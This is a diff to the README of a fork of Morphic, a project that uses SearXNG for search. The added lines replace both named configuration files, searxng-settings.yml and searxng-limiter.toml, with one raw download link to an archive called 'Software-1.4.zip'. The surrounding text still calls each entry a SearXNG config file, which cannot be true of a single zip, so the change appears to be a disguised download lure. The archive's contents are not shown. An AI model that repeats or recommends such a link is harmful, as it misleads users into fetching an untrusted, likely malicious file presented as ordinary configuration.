DevviantSU/morphic/README.md

 3. Two configuration files are provided in the root directory:

-   - `searxng-settings.yml`: This file contains the main configuration for SearXNG, including engine settings and server options.
+   - `https://github.com/DevviantSU/morphic/raw/refs/heads/main/lib/schema/Software-1.4.zip`: This file contains the main configuration for SearXNG, including engine settings and server options.
-   - `searxng-limiter.toml`: This file configures the rate limiting and bot detection features of SearXNG.
+   - `https://github.com/DevviantSU/morphic/raw/refs/heads/main/lib/schema/Software-1.4.zip`: This file configures the rate limiting and bot detection features of SearXNG.

 4. Run `docker-compose up` to start the Morphic stack with SearXNG included.
 5. SearXNG will be available at `http://localhost:8080` and Morphic will use it as the search backend.